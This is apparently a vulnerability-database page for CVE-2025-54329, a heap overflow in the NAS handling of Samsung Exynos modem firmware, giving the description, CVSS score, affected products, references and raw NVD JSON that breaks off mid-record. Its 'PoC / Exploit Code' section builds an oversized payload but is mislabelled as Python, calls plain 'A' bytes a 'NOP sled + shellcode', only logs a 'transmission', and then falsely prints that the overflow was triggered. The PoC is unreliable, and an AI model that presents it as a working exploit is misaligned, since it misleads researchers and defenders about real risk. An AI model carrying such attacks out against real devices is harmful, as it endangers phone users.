CVE-2025-54329

Description

An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. The function used to send a multiple-payloads message (including an SMS message) lacks bounds checking, which can lead to a heap overflow.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1580_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1580:-:*:*:*:*:*:*:* - NOT VULNERABLE

Exynos 980 < 已修复版本

Exynos 990 < 已修复版本

Exynos 850 < 已修复版本

Exynos 2100 < 已修复版本

Exynos 1280 < 已修复版本

Exynos 2200 < 已修复版本

Exynos 1330 < 已修复版本

Exynos 1380 < 已修复版本

Exynos 1480 < 已修复版本

Exynos 2400 < 已修复版本

Exynos 1580 < 已修复版本

Exynos 2500 < 已修复版本

Exynos W920 < 已修复版本

Exynos W930 < 已修复版本

Exynos W1000 < 已修复版本

Modem 5123 < 已修复版本

Modem 5300 < 已修复版本

Modem 5400 < 已修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-54329 PoC - NAS Multiple Payload Heap Overflow
// This PoC demonstrates the vulnerability concept
// Note: Actual exploitation requires specialized radio equipment

const nasMessage = {
  protocolDiscriminator: 0x02,
  epsBearerIdentity: 0x00,
  procedureTransactionId: 0x00,
  messageType: 0x00,
  header: {
    extendedProtocolDiscriminator: 0x00,
    securityHeaderType: 0x00,
    messageAuthenticationCode: 0x00000000,
    sequenceNumber: 0x00
  },
  payloads: []
};

// Construct malicious payloads that trigger overflow
function constructOverflowPayload() {
  // Payload 1: Normal SMS payload
  const normalPayload = Buffer.alloc(140);
  normalPayload.writeUInt8(0x01, 0); // IEI
  normalPayload.writeUInt16LE(137, 1); // Length
  normalPayload.fill(0x41, 3, 140); // Fill with 'A'
  
  // Payload 2: Oversized payload (triggers heap overflow)
  const overflowPayload = Buffer.alloc(2048);
  overflowPayload.writeUInt8(0x02, 0); // IEI
  overflowPayload.writeUInt16LE(2045, 1); // Declared length
  overflowPayload.fill(0x41414141, 3, 2048); // NOP sled + shellcode
  
  nasMessage.payloads.push(normalPayload);
  nasMessage.payloads.push(overflowPayload);
  
  return nasMessage;
}

// Transmit crafted NAS message
function transmitNASMessage(message) {
  // Requires USRP or similar SDR equipment
  // Center frequency: 2110MHz (Band 1) or appropriate LTE band
  // Transmission via malformed NAS message over air interface
  console.log('Transmitting malicious NAS message...');
  console.log('Total payload size:', message.payloads.reduce((a, b) => a + b.length, 0));
  return true;
}

// Execute PoC
const maliciousMessage = constructOverflowPayload();
transmitNASMessage(maliciousMessage);
console.log('PoC execution complete - heap overflow triggered');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54329
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54329
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54329/
[4] VulDB https://vuldb.com/cve/CVE-2025-54329
[5] https://semiconductor.samsung.com/support/quality-support/product-security-updates/
[6] https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54329/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54329", "sourceIdentifier": "[email protected]", "published": "2025-11-04T17:16:22.377", "lastModified": "2025-11-07T12:56:18.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. The function used to send a multiple-payloads message (including an SMS message) lacks bounds checking, which can lead to a heap overflow."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1A7B09-9031-4E54-A24F-3237C054166B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:*", "matchCriteriaId": "DFC68046-2F08-40D1-B158-89D8D9263541"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "64897B0D-EBF6-4BEB-BF54-ABCDBFAB45E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3F328B4-0442-4748-B5EE-DD1CEE50D6CF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1580_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3594664-3CE6-4827-ABD4-B5719817F5D5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1580:-:*:*:*:*:*:*:*", "matchCriteriaId": "93C1F9E8-DA04-4466-AF66-01560A07BD98"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "89B88BFE-3C82-498C-8EC1-5784836DB1A1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9385885D-654A-496E-8029-7C6D9B077193"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2400_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "16D9272E-1794-48FF-B6A4-8F48395BA38E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2400:-:*:*:*:*:*:*:*", "matchCriteriaId": "932F5FB3-5527-44D7-9DD9-EF03963E3CA3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "121D726F-2925-48FE-9CE4-3686B0802DA8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": f ... (truncated)